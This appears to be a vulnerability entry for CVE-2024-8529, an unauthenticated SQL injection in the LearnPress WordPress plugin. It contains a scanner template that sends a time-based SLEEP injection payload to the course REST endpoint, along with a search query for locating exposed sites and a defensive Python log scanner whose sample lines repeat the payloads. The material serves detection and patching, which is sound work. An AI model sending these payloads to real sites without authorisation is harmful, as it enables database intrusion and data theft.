The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
PoC code [public]

id: CVE-2024-8529

info:
  name: LearnPress < 4.2.7.1 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
  remediation: |
    Update the LearnPress plugin to version 4.2.7.1 or later.
  reference:
    - https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8529
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-8529
    cwe-id: CWE-89
    epss-score: 0.60517
    epss-percentile: 0.98189
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="wp-content/plugins/learnpress"
    vendor: thimpress
    product: learnpress
  tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "contains(content_type, 'application/json')"
          - contains_all(body, 'id\":', 'name\":')
        condition: and
# digest: 4a0a0047304502210082ce59e1ae5bce25eabdc196bc4c3353f589040fe8217c1bcc2451f1526cd6a40220681569adcb52da33ad99c27fb8e23ad2be0182f2f427e85500acf07f5f29818e:922c64590222798bb761d5b6d8e72950
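Added example for defenders (not part of the template above or of the LearnPress project): a small access-log scan that flags requests carrying SQL syntax in the `c_fields` parameter on the two course routes named on this page, plus a version comparison against the 4.2.7.1 fix. The route list, token regex and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Both REST routes mentioned on this page (advisory text and template request).
LEARNPRESS_COURSE_ROUTES = (
    "/wp-json/lp/v1/courses/archive-course",
    "/wp-json/learnpress/v1/courses",
)
FIXED_VERSION = (4, 2, 7, 1)  # first patched LearnPress release

# Request line of an Apache/nginx combined-format access log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A legitimate c_fields value is a comma-separated list of column names; SQL
# keywords, parentheses and quotes have no business in it.
SQL_TOKENS = re.compile(r"""\b(select|sleep|benchmark|union|from)\b|[()'"]""", re.I)

def version_tuple(version):
    return tuple(int(part) for part in version.split("."))

def is_vulnerable_version(installed):
    """True when the installed LearnPress version predates the 4.2.7.1 fix."""
    return version_tuple(installed) < FIXED_VERSION

def suspicious_c_fields(log_line):
    """Return the decoded c_fields value when the request targets a LearnPress
    course route and the value contains SQL syntax; otherwise None."""
    match = LOG_RE.search(log_line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if not any(parts.path.startswith(route) for route in LEARNPRESS_COURSE_ROUTES):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("c_fields", []):
        decoded = unquote_plus(value)  # second decode catches double-encoded input
        if SQL_TOKENS.search(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line index, offending c_fields value) for every flagged line."""
    hits = []
    for index, line in enumerate(lines):
        value = suspicious_c_fields(line)
        if value is not None:
            hits.append((index, value))
    return hits

# Constructed sample log lines: one benign request, two probes, one unrelated route.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Oct/2024:10:00:01 +0000] "GET /wp-json/learnpress/v1/courses?c_fields=id,name HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Oct/2024:10:00:07 +0000] "GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Oct/2024:10:00:09 +0000] "GET /wp-json/lp/v1/courses/archive-course?c_fields=%28SELECT%28SLEEP%285%29%29%29 HTTP/1.1" 200 512',
    '198.51.100.8 - - [01/Oct/2024:10:00:11 +0000] "GET /wp-json/wp/v2/posts?search=select HTTP/1.1" 200 512',
]
```

Pair a hit from `scan` with the template's own signal (response time at or above the injected sleep) to separate real probes from noisy scanners.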